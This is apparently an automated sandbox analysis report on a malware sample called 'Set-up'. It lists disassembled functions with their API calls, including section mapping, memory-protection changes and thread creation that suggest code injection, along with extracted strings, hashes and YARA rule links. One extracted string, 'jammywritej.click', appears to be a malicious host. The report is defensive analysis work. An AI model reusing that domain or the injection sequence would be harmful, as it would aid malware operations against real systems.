API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
String ID:
API String ID: 1416286485-0
Opcode ID: 03e2ba83ba279f76566213406a6e905ace216211d37c94e3df81ab69eb58e1b5
Instruction ID: ffbd290e947328b1a5192e892d216be2b86dcee257f39f5cb0a02d254f3f41d7
Opcode Fuzzy Hash: 03e2ba83ba279f76566213406a6e905ace216211d37c94e3df81ab69eb58e1b5
Instruction Fuzzy Hash: A221B2F161D281DBD7202F70BD0EB2A7BA8EF047A1F04412CFD49D7157EE61C81086A2

Function 01F1EF01 Relevance: 12.7, APIs: 8, Instructions: 730memorynativethreadCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 01F1EF9A
NtMapViewOfSection.NTDLL(?,00000000), ref: 01F1F042
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 01F1F3B6
NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 01F1F46B
VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 01F1F488
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 01F1F52B
VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 01F1F55E
CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 01F1F6CF

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID: Virtual$ProtectSection$CreateView$AllocThread
String ID:
API String ID: 1248616170-0
Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
Instruction ID: 7d68c0f71427dba02e13f368e5d4b6c566ea089d76818887fb51dfd0a455d15f
Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
Instruction Fuzzy Hash: 0B428A72A08341AFDB24CF28CC44B6BBBE9EF88714F04492DF9859B255D732E949CB51

Function 09160247 Relevance: 11.2, APIs: 1, Strings: 5, Instructions: 700
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL ref: 091604C9

Strings

X@, xrefs: 09160916
$, xrefs: 09160985
f@, xrefs: 091609E4
<., xrefs: 0916088E
i, xrefs: 091609EE

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: $$<.$X@$f@$i
API String ID: 237503144-92190101
Opcode ID: 80083c5bcf7dbbf38dd2be2b3997466709b2c52c6b7f91e00fe8222a0a845ed5
Instruction ID: 562162e6cbd52401cc6b498988f35e6cb05037e1576e672a2d72a0ee13af3d32
Opcode Fuzzy Hash: 80083c5bcf7dbbf38dd2be2b3997466709b2c52c6b7f91e00fe8222a0a845ed5
Instruction Fuzzy Hash: 3F528572A197508BD364DF38C4913AEB7E1AF89364F059A2EE8EAC73D0D77484418B43

Function 091616A0 Relevance: 11.1, APIs: 3, Strings: 2, Instructions: 2356COMMON

Download Yara Rule

Strings

&8, xrefs: 091619C3
`, xrefs: 091625BC

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: &8$`
API String ID: 0-842996520
Opcode ID: 8067507ffda2dd7275ff6419825de69340871b8126d268ca3f365d25b04dfd29
Instruction ID: cb837a61a3e1ac908a2090bc021f09681b03cb5ed49f6245a38a3c05449b302f
Opcode Fuzzy Hash: 8067507ffda2dd7275ff6419825de69340871b8126d268ca3f365d25b04dfd29
Instruction Fuzzy Hash: 5D130676E042248FDB14DF78C94139EBBF1AF45314F0686ADD869EB3A1E7348951CB82

Function 01ED0341 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 399
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 01ED05E4

Strings

lS)p, xrefs: 01ED03E9
8@, xrefs: 01ED03DF
T%N5, xrefs: 01ED03D5

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: 8@$T%N5$lS)p
API String ID: 2422867632-1087474138
Opcode ID: b6e1a05bc5eb844e1a9b1742a3db0f03802b83d54ca94f1d240b8de7a2ca5e17
Instruction ID: b4ec2ab3edc0040a28ac25765df271d2212b48f407764bb018acc23020d9bb41
Opcode Fuzzy Hash: b6e1a05bc5eb844e1a9b1742a3db0f03802b83d54ca94f1d240b8de7a2ca5e17
Instruction Fuzzy Hash: 3C12BFB4E00219DBDB14DF98C990BEDBBB1FF88304F2482A9E515AB385D774AA41CF54

Function 09159C6F Relevance: 6.4, Strings: 5, Instructions: 150
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

)XPX, xrefs: 09159D92
%X:X, xrefs: 09159D9C
7XvX, xrefs: 09159DA6
IX6X, xrefs: 09159DB0
&XSX, xrefs: 09159D88

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: %X:X$&XSX$)XPX$7XvX$IX6X
API String ID: 0-642955395
Opcode ID: 06bd462e10b65172b2ce4bf72963cc9eb0b340db30a73db8ac544fa6433e1ffa
Instruction ID: 090d63dec1afcd5fc12d8d92b145b24e34ec0483eb91fed1d0c0d4b216ff21eb
Opcode Fuzzy Hash: 06bd462e10b65172b2ce4bf72963cc9eb0b340db30a73db8ac544fa6433e1ffa
Instruction Fuzzy Hash: 9D416873F103298BDB40CFA5CC807DABB76FB82B04F0581AC8518A7240EB749642CF80

Function 01ED0A51 Relevance: 6.1, APIs: 4, Instructions: 100
threadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,01ED0597,?,00000001,?,81EC8B55,000000FF), ref: 01ED0A8F
Thread32First.KERNEL32(00000000,0000001C), ref: 01ED0ABB
Wow64SuspendThread.KERNEL32(00000000), ref: 01ED0B0E
CloseHandle.KERNEL32(00000000), ref: 01ED0B38

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
String ID:
API String ID: 1849706056-0
Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction ID: c633024709187cae5001206c0422a844f860a593a1a9b0320182e1df5ee7adf6
Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction Fuzzy Hash: 88410F75600108EFDB18DF58C490FADB7F6EF88304F24C168E6159B794DA34AE46CB54

Function 09171570 Relevance: 5.6, Strings: 4, Instructions: 586
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,, xrefs: 09171B60
!@, xrefs: 091715A3
H, xrefs: 09171859
H, xrefs: 09171863

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: AllocateHeapInitializeThunk
String ID: !@$,$H$H
API String ID: 383220839-4170808191
Opcode ID: 0a8f23a67d6745639b4e465a3f731931fa063dca67c1a143e12dbcb985114c8c
Instruction ID: 34399249070a11d7066153fae3d301f810092cf226c2f9cc8b83b9298be79e02
Opcode Fuzzy Hash: 0a8f23a67d6745639b4e465a3f731931fa063dca67c1a143e12dbcb985114c8c
Instruction Fuzzy Hash: 2F32BD7170C3419FD3289F68C4953AFF7F2AF85328F19892DE59987390E77988458B42

Function 09176520 Relevance: 4.1, Strings: 3, Instructions: 380
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

X`X*, xrefs: 0917691B
l'Y9, xrefs: 09176913
{$[7, xrefs: 09176936

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: InitializeThunk
String ID: X`X*$l'Y9${$[7
API String ID: 2994545307-1509796914
Opcode ID: fad4ef1dce9b294a7ae66538188233bd5ff973c164de7de173bb2415f3c495ff
Instruction ID: 532756c3b637b006dfb7747b256a8cb0dd643d5f3c888539a057c3b817cc45f9
Opcode Fuzzy Hash: fad4ef1dce9b294a7ae66538188233bd5ff973c164de7de173bb2415f3c495ff
Instruction Fuzzy Hash: 7BB12A72F047169BEB14CE14C8417ABF3B2EF95788F46852CF8499B355E335E9098392

Function 0915A8B0 Relevance: 4.1, Strings: 3, Instructions: 349
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

j>a>, xrefs: 0915AA0F
F>]>, xrefs: 0915A97F
ok, xrefs: 0915AAC3

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: F>]>$j>a>$ok
API String ID: 0-2883800044
Opcode ID: 45d3ff4846e2855d31a650d4cfcff47a9637c710727507d3dca641220a039d5a
Instruction ID: 7f55fd30b68a6e358c1486b6008807f6a4a4b1a3d7c444c71f9dc8169889fa29
Opcode Fuzzy Hash: 45d3ff4846e2855d31a650d4cfcff47a9637c710727507d3dca641220a039d5a
Instruction Fuzzy Hash: EAB1E172A4C311CBC328DF14C45156FBBE6EFD1308F164A2CE9E69B340D33999098B9A

Function 0917CE60 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNEL32(?), ref: 0917CF80

Strings

8a, xrefs: 0917CE70

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: 8a
API String ID: 3960555810-1827930058
Opcode ID: a57b87f8ce301600d67c2683b864c54425c71bab2450f75ae1f78e8f269bbb6e
Instruction ID: c8ab188f6756f9cfb3eda5c1b7c38e8e2f7f74342f106f90c6d4708665e01b68
Opcode Fuzzy Hash: a57b87f8ce301600d67c2683b864c54425c71bab2450f75ae1f78e8f269bbb6e
Instruction Fuzzy Hash: 2CB1E271A0C3828BD729CF29D45136BFBE1AFD6308F18886DE0D6973A1D7798005CB52

Function 01ED0901 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 01ED09CD

Strings

,, xrefs: 01ED0A19

Memory Dump Source

Source File: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Offset: 01ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ed0000_Set-up.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: ,
API String ID: 2422867632-3772416878
Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction ID: 41cd4b111f133b042688e2168b5389c5e86b80bb6972aa852c5af7dec85abc49
Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction Fuzzy Hash: 0F41C674A00209EFDB14CF98C994BAEB7B1FF88314F248298E5156B385D771AE81CF95

Function 0918D0D9 Relevance: 2.6, Strings: 2, Instructions: 135COMMON

Download Yara Rule

Strings

9., xrefs: 0918D200
9., xrefs: 0918D150

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: InitializeThunk
String ID: 9.$9.
API String ID: 2994545307-2940951921
Opcode ID: 00417dfa6ba534fd84668723e8c7c3f925964d6f98bac9bad51f2b1fab800316
Instruction ID: 4a9f569b4b2097312d52cc45d2136c87586073e17b4954ea9b3f4d870617f872
Opcode Fuzzy Hash: 00417dfa6ba534fd84668723e8c7c3f925964d6f98bac9bad51f2b1fab800316
Instruction Fuzzy Hash: 1A412579F002206FD705AE28DD50B27B293EBC5719F15D628E989E73C8DB75A8409AC1

Function 0917C8D0 Relevance: 1.9, APIs: 1, Instructions: 364COMMON

Download Yara Rule

APIs

GetPhysicallyInstalledSystemMemory.KERNEL32(?), ref: 0917CF80

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID:
API String ID: 3960555810-0
Opcode ID: a72f58385f242c133b1d87ac71cc8ca505e605f1173bfe921049d1011c47d48d
Instruction ID: e3a988668234ffc22dd0e5b3bf98aef863ea9239c394a4c65034e8a67a69a6eb
Opcode Fuzzy Hash: a72f58385f242c133b1d87ac71cc8ca505e605f1173bfe921049d1011c47d48d
Instruction Fuzzy Hash: C4A1E571A0C3828BE729CF29D85136BFBE1AFD6308F18986DE0D697391D7798405CB52

Function 09164E25 Relevance: 1.8, APIs: 1, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62627ec992a3c752a9b80d494203c59c80e44b002bacd2e347c41e898ac816df
Instruction ID: 2de39a133252da6a6031668643ec0fe255d207d04c764c6263ef1735fd4aca64
Opcode Fuzzy Hash: 62627ec992a3c752a9b80d494203c59c80e44b002bacd2e347c41e898ac816df
Instruction Fuzzy Hash: CCA117B5E082819FD724CF28C49076EBBE1AB99308F09492DF0DAC33A2D735D955CB52

Function 0918FB10 Relevance: 1.6, Strings: 1, Instructions: 360COMMON

Download Yara Rule

Strings

mLjL, xrefs: 0918FB90

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: InitializeThunk
String ID: mLjL
API String ID: 2994545307-1911556848
Opcode ID: 2a5f6c6b66abddb3d8df2426ce068bbcb7054d1016efd7c1b100ca8f721bc8a4
Instruction ID: 821fc36a4522d2ae14bcf5ac5362550a0b73c5ba44c10f1dab8079822cdd1f2b
Opcode Fuzzy Hash: 2a5f6c6b66abddb3d8df2426ce068bbcb7054d1016efd7c1b100ca8f721bc8a4
Instruction Fuzzy Hash: 01B12832B042118BD728DE18C89196FB7A2EFC8718F16C52CE99957391DB35AC069BC2

Function 0918CD20 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0919009B,76E87000,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0918CD4E

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0915C942 Relevance: 1.4, Strings: 1, Instructions: 141COMMON

Download Yara Rule

Strings

G9, xrefs: 0915C992

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: G9
API String ID: 0-2716091189
Opcode ID: b012bf8c97eccf4d20889c29ef61c656fe4992e1c3e311e68ec037890c6d96ac
Instruction ID: e7b87c1f197654e1bbdcc7c5ad7b994645a88939943887b9b51a1efb04f9174f
Opcode Fuzzy Hash: b012bf8c97eccf4d20889c29ef61c656fe4992e1c3e311e68ec037890c6d96ac
Instruction Fuzzy Hash: 494101727483218BCB28DF25CC526ABB7B2EFC5314F0A591CF8965BB90E7789504C786

Function 091900C0 Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

@, xrefs: 09190172

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: ff761264627a1c05df5db0c54f6f1b6039b0225e059f2540d2c891dcf57ffd11
Instruction ID: 422a624cb9589a5aca81ed06eb91dbdd9e2481dfb179f0fdfb1d4be7371cce5a
Opcode Fuzzy Hash: ff761264627a1c05df5db0c54f6f1b6039b0225e059f2540d2c891dcf57ffd11
Instruction Fuzzy Hash: 06416470A143008BDB14CF14CC80A6BB7F5FF8931CF09852CE98A5B3A0E7769844C782

Function 0918D9C1 Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

@, xrefs: 0918DA4D

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: f50c02c57b993fc804bcf5376e85b1d2a1a491a4058ca0ce7ab02706caaf7c97
Instruction ID: 36af7827943c4796addd1446ab1efc3b183468399e43d8e0639bfa4372bbdd94
Opcode Fuzzy Hash: f50c02c57b993fc804bcf5376e85b1d2a1a491a4058ca0ce7ab02706caaf7c97
Instruction Fuzzy Hash: 1A411FB4B093109BD718EF28D951B3BB6E6EFC5708F14992CE481AB3D4E73598448B92

Function 0918F040 Relevance: 1.3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

Strings

@, xrefs: 0918F090

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 030190cb11db8f9acc28d363a1064a7cfcaa5f9d5633d235e87fc875db8f3a71
Instruction ID: 1d7b03f115cf1f4ee7e41885b2f0f87d4d1e76110d7a70c826840d694b2cef56
Opcode Fuzzy Hash: 030190cb11db8f9acc28d363a1064a7cfcaa5f9d5633d235e87fc875db8f3a71
Instruction Fuzzy Hash: C621C1B56193049FC310DF18D88066BB7F6FFC5324F15592CE59897350D372A545CBA2

Function 0915C08B Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

|X|X, xrefs: 0915C0EF

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID: |X|X
API String ID: 0-2218283020
Opcode ID: 1084767eeed0ed1ba1fd63881de7ca6c36ba910cf77d82fd21448790841a3cf3
Instruction ID: 805235f80a1dbfc8c97b378b39b5f46b018f35a1ca8d9fdace45a113f2196f84
Opcode Fuzzy Hash: 1084767eeed0ed1ba1fd63881de7ca6c36ba910cf77d82fd21448790841a3cf3
Instruction Fuzzy Hash: DD2193BAE006268BC7258F58C8957AAB3B1FF49700F024228ED59FB750D635AC4187D4

Function 0918F150 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9a4580baf5978570a30d7c5e77bada8f7f479b2fb540021bc7da460d9c7c2eae
Instruction ID: 239442d47ffae690f48cc18491df12f319b7a8b4f616af149edd3f0bd58d124a
Opcode Fuzzy Hash: 9a4580baf5978570a30d7c5e77bada8f7f479b2fb540021bc7da460d9c7c2eae
Instruction Fuzzy Hash: 43811836B042119BCB25AF18CC51A6FB3A2FFC4714F16952CED859B364EB30A852DBC1

Function 09187960 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b231c9e8acb63a73ac119244347cbf80ee3ce2472c3c643959086d76186a3818
Instruction ID: 65e7e72ebabfc1889a4c7b90e414cc71dca9c56cf3d5d23cfa47e83bdf9d127d
Opcode Fuzzy Hash: b231c9e8acb63a73ac119244347cbf80ee3ce2472c3c643959086d76186a3818
Instruction Fuzzy Hash: 67A10432F052158FEB04EF78C9813AF7BE2AF84324F268529E455973C5D7794942DB82

Function 0918B1D0 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b7becca96e2b911a0222d8297865986bef42a27249e7d0227cab5508f3a70b09
Instruction ID: 071558955be4defeaae722ee9d7988482e089e0284a899a94a88983ab61c4b5d
Opcode Fuzzy Hash: b7becca96e2b911a0222d8297865986bef42a27249e7d0227cab5508f3a70b09
Instruction Fuzzy Hash: 17512435F482189BD721BF24D94476BB3A2FBC4704F16843DE9855B361E77268509B82

Function 0915C621 Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64329f37d03180106298c5d9df852be2b4d1c8e6d3fed5065e2248a7c346da72
Instruction ID: 947a92f91264c521685df58f37ce69b58d90e0a838472451e3f001c65ed68019
Opcode Fuzzy Hash: 64329f37d03180106298c5d9df852be2b4d1c8e6d3fed5065e2248a7c346da72
Instruction Fuzzy Hash: 57512933A943258BD318CE64CC807ABB6E3EBC4304F1A943CED89E7780EB7999054785

Function 0917CC5D Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42b1ef6f8674a004ae2165cfc83958672db0565dfa81a4ec0f661be3836dc675
Instruction ID: 0772b922546313b8d591a4db1588e5168a3296118d7dbff82446953be422c223
Opcode Fuzzy Hash: 42b1ef6f8674a004ae2165cfc83958672db0565dfa81a4ec0f661be3836dc675
Instruction Fuzzy Hash: D2517B32B99B538BE7148A25C8D01A6FBA2DF86399F0CC739D8E5473C1D3289515C7D1

Function 0917B00F Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ae9944a689c94f6b5c623b9fc6a5f66af85f78c761977ffc82c0277fbd05179
Instruction ID: a17afc09d7082ee87e80bc37dddc9734b295d4574088055f761c036e6397380a
Opcode Fuzzy Hash: 8ae9944a689c94f6b5c623b9fc6a5f66af85f78c761977ffc82c0277fbd05179
Instruction Fuzzy Hash: 7A415B21FDD3578BEB1889248C522B6F7B1EB56349F0D823DD45687381E728D819D3D1

Function 091904D0 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8eaca723eeae495e753cbec14fde4a0f196f5a06747877c47726ce0b12c81acd
Instruction ID: 6edabd5b53be75d31e21a3c3d6e6fcbeaa2702e7ceece94d0643dd6322254b38
Opcode Fuzzy Hash: 8eaca723eeae495e753cbec14fde4a0f196f5a06747877c47726ce0b12c81acd
Instruction Fuzzy Hash: 264178347653049FEF158E58DD81BBAB3A6EBCC318F18552CF1848B2A0D771E850C741

Function 0915E042 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 327
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 0915E04E

Strings

&j=, xrefs: 0915E1DE
jammywritej.click, xrefs: 0915E47B
>, xrefs: 0915E3F1

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: Uninitialize
String ID: >$&j=$jammywritej.click
API String ID: 3861434553-3290608814
Opcode ID: 192cf92931d4536a7fd0c358cb19bdf6eaa962360ec1a7133f2cdb953b148e5a
Instruction ID: 0d455345c0aac883d31fc934488c27e1867c4e47f133fdffa701f3acb6ae423d
Opcode Fuzzy Hash: 192cf92931d4536a7fd0c358cb19bdf6eaa962360ec1a7133f2cdb953b148e5a
Instruction Fuzzy Hash: 82A10171A0D382DBD3308F29D4943ABBBE2BFC1304F19995CD4EA5B265D7390509CB92

Function 091586C0 Relevance: 6.1, APIs: 4, Instructions: 93
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 091586E8
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 091586F9
GetForegroundWindow.USER32 ref: 091587BA
RtlExitUserThread.NTDLL(00000000), ref: 091587F9

Memory Dump Source

Source File: 00000000.00000002.2911821821.0000000009151000.00000020.10000000.00040000.00000000.sdmp, Offset: 09151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9151000_Set-up.jbxd

Similarity

API ID: Thread$CurrentExitFolderForegroundPathSpecialUserWindow
String ID:
API String ID: 1419099018-0
Opcode ID: b934aa32f7f6ff92cdc2db16464ac5ff384bbf3a857c2ce051f7e54f9a3b008d
Instruction ID: 0432a59a24518bff23d7304afa7654899160ecb1d5f890790c7dd0645d5bb98f
Opcode Fuzzy Hash: b934aa32f7f6ff92cdc2db16464ac5ff384bbf3a857c2ce051f7e54f9a3b008d
Instruction Fuzzy Hash: E6214C71F402009FD318FF34DC0A75A3692AF81718F1AC969E8A2DB2A5DF394441C6A2

Function 01F1FB7F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66libraryCOMMON

Download Yara Rule

APIs

